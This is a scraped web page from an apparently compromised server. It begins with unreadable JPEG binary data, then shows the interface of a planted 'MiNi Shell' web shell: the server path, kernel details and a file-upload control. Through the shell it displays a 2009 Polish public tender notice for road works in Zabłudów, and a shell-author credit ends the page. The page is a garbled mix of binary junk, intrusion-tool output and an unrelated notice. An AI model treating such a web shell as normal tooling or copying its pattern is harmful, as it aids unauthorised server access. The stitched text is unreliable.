JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090109/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090109/9789-N-2009.html

<p class="kh_header"><b>Białystok: Przebudowa ulicy 3-go Maja w Zabłudowie</b><br>
<b>Numer ogłoszenia: 9789 - 2009; data zamieszczenia: 09.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Białymstoku , Zaścianki, Szosa Baranowicka 37, 15-522 Białystok, woj. podlaskie, tel. (085) 740-21-49, 740-22-17, faks (085) 740-22-19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzd-bialystok.bianet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulicy 3-go Maja w Zabłudowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót dla zadania  I - wykonanie chodników, krawężników i zjazdów
- odtworzenie trasy i punktów wysokościowych w ilości 0,88 km
- roboty rozbiórkowe (rozbiórka krawężników w ilości 497 m, rozbiórka chodników z płyt betonowych w ilości 596 m2, rozbiórka chodników z płyt drogowych betonowych (trylinki) w ilości 270 m2),
- ustawienie krawężników o wym. 15x30 cm w ilości 880 m,
- wykonanie chodników z kostki brukowej gr. 6 cm w ilości 1063,5 m2,
- ustawienie obrzeży o wym. 20x6 cm w ilości 497 m,
- wykonanie wjazdów i wyjazdów z kostki brukowej betonowej gr. 8 cm w ilości 362 m2,
- wykonanie zjazdów na drogi boczne z nawierzchnią utwardzoną z betonu asfaltowego w ilości 13 m2.
- oznakowania i zabezpieczenia robót zgodnie z obowiązującymi przepisami dokona wykonawca robót.
Zakres robót dla zadania II - wykonanie nawierzchni
- niwelacja stanu istniejacego co 25 m i w punktach charakterystycznych, niwelacja powykonawcza w tych samych punktach - 0,88 km
- wcinka w nawierzchni bitumicznej na początku i końcu trasy w ilości 24 m2,
- oczyszczenie i skropienie warstw konstrukcyjnych mechanicznie w ilości 5280 m2,
- wykonanie nawierzchni z betonu asfaltowego
- warstwa ścieralna o uziarnieniu 0/12,8 o gr. 4cm w ilości 5304 m2,
- oznakowania i zabezpieczenia robót zgodnie z obowiązującymi przepisami dokona wykonawca robót.

Zakres robót dla zadania  II - chodniki, krawężniki i zjazdy
- roboty rozbiórkowe (rozbiórka krawężników w ilości 497 m, rozbiórka chodników z płyt betonowych w ilości 596 m2, rozbiórka chodników z płyt drogowych betonowych (trylinki) w ilości 270 m2),
- ustawienie krawężników o wym. 15x30 cm w ilości 880 m,
- wykonanie chodników z kostki brukowej gr. 6 cm w ilości 1063,5 m2,
- ustawienie obrzeży o wym. 20x6 cm w ilości 497 m,
- wykonanie wjazdów i wyjazdów z kostki brukowej betonowej gr. 8 cm w ilości 362 m2,
- wykonanie zjazdów na drogi boczne z nawierzchnią utwardzoną z betonu asfaltowego w ilości 13 m2.
- oznakowania i zabezpieczenia robót zgodnie z obowiązującymi przepisami dokona wykonawca robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.32.22-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wpłaty wadium przy składaniu wniosku<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Oferent powinien:
1. Mieć prawo do występowania w obrocie prawnym                                   
2.Nie podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 oraz spełniać warunki określone w art. 22 ust. 1 PZP                                                        
3. Dysponować odpowiednimi pracownikami: 
- kierownik budowy powinien posiadać uprawnienia do kierowania robotami w zakresie dróg lub bez ograniczeń i należeć do izby inżynierów budownictwa      
- geodeta uprawniony ( na okres realizacji robót)                                       
4. W ciągu 2 lat wykonać min. 3 zadania o podobnym charakterze  poświadczone referencjami                                                                   
5. Musi dysponować odpowiednim sprzętem zgodnym z technologią wykonywania robót                                            
6. Udzieli gwarancji na min. 24 miesiące                                                 
7. Będzie posiadać na cały czas trwania budowy ubezpieczenie od odpowiedzialności cywilnej 
8. Będzie posiadać dostęp do laboratorium wykonującego badania w trakcie wykonywania zamówienia                                                                 
9. Będzie posiadać oznakowanie i zabezpieczenie robót.
Warunki będą oceniane na zasadzie spełnia /nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Aktualny (czyli odzwierciedlający stan faktyczny) dokument dopuszczający do obrotu prawnego w zakresie objętym zamówieniem (odpis z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej) - wystawiony nie wcześniej niż 6 miesięcy przed upływem składania ofert.                                2. Oświadczenie, że Oferent nie podlega wykluczeniu na podstawie art 24 ust. 1 i 2 i spełnia warunki określone w art. 22 ust.1 ustawy Prawo zamówień publicznych wraz z aktualnymi zaświadczeniami:
a) Zaświadczeniem z właściwego urzędu skarbowego o nie zaleganiu z podatkami (ważne na dzień upływu terminu składania ofert, a w przypadku braku wskazania terminu ważności, datowane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert).                                                                   
b) Zaświadczeniem z ZUS-u o nie zaleganiu ze składkami na ubezpieczenie społeczne lub zdrowotne (ważne na dzień upływu terminu składania ofert, a w przypadku braku wskazania terminu ważności, datowane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert). Uwaga: W punktach a) i b) Oferent może przedłożyć zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności.                                  
c) Informacją z Krajowego Rejestru Karnego na temat karalności Oferenta w zakresie określonym w art. 24 ust.1 pkt4-8 i art. 24 ust. 1 pkt. 9ustawy. W przypadku, gdy Oferent jest osobą prawną, informacje powinny dotyczyć urzędujących członków zarządu. Informacja powinna być wydana nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.                                    
3. Umowę spółki cywilnej, jeżeli działalność gospodarcza przedsiębiorców jest prowadzona w formie spółki cywilnej.                                                    
4. Wykaz pracowników odpowiedzialnych za realizację zamówienia z udokumentowaniem ich kwalifikacji (kopie uprawnień osób przewidzianych do kierowania robotami i przynależnością do Izby Inżynierów).W przypadku zaangażowania osób nie będących pracownikami Oferenta należy załączyć ich oświadczenia o gotowości do współpracy przy realizacji zamówienia               
5. Wykaz sprzętu, przewidzianego do realizacji zamówienia                           
6. Dane o doświadczeniu Oferenta w zakresie realizacji robót budowlanych w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania, a jezeli działalność wykonawcy jest krótsza to z tego okresu zbliżonych co do zakresu i wartości do robót objętych zamówieniem wraz z referencjami od poprzednich Zamawiających. 
7. Dane dotyczące zakresu robót, który oferent ma zamiar powierzyć podwykonawcom                                                                                        8. Polisę lub inny dokument ubezpieczenia potwierdzający , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej                                                                                              9. Oświadczenie o posiadanym oznakowaniu i zabezpieczeniu robót.                 
10. Oświadczenie o laboratorium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wniosek o dopuszczenie wraz z załącznikami jest na w/p stronie intermetowej
Specyfikacja istotnych warunków zamówienia zostanie przekazana wraz z zaproszeniem do wzięcia udziału w postępowaniu.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.01.2009 godzina 10:00, miejsce: Siedziba Zamawiającego pokój nr 9.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa ulicy 3-go Maja w Zabłudowie - wykonanie chodników, krawężników i zjazdów.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót:
- odtworzenie trasy i punktów wysokościowych w ilości 0,88km
- roboty rozbiórkowe (rozbiórka krawężników w ilości 497 m, rozbiórka chodników z płyt betonowych w ilości 596 m2, rozbiórka chodników z płyt drogowych betonowych (trylinki) w ilości 270 m2),
- ustawienie krawężników o wym. 15x30 cm w ilości 880 m,
- wykonanie chodników z kostki brukowej gr. 6 cm w ilości 1063,5 m2,
- ustawienie obrzeży o wym. 20x6 cm w ilości 497 m,
- wykonanie wjazdów i wyjazdów z kostki brukowej betonowej gr. 8 cm w ilości 362 m2,
- wykonanie zjazdów na drogi boczne z nawierzchnią utwardzoną z betonu asfaltowego w ilości 13 m2.
- oznakowanie i zabezpieczenie robót zgodnie z obowiązującymi przepisami dokona wykonawca robót..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.05.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa ulicy 3 - go Maja w Zabłudowie - wykonanie nawierzchni.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót:
- niwelacja stanu istniejącego co 25 m i w punktach charakterystycznych, niwelacja powykonawcza w tych samych punktach -  0,88 km,
- wcinka w nawierzchni bitumicznej na początku i końcu trasy w ilości 24 m2,
- oczyszczenie i skropienie warstw konstrukcyjnych mechanicznie w ilości 5304 m2,
- wykonanie nawierzchni z betonu asfaltowego
- warstwa ścieralna o uziarnieniu 0/12,8 o gr. 4cm w ilości 5304 m2,
- znakowania i zabezpieczenia robót zgodnie z obowiązującymi przepisami dokona wykonawca robót..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.05.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com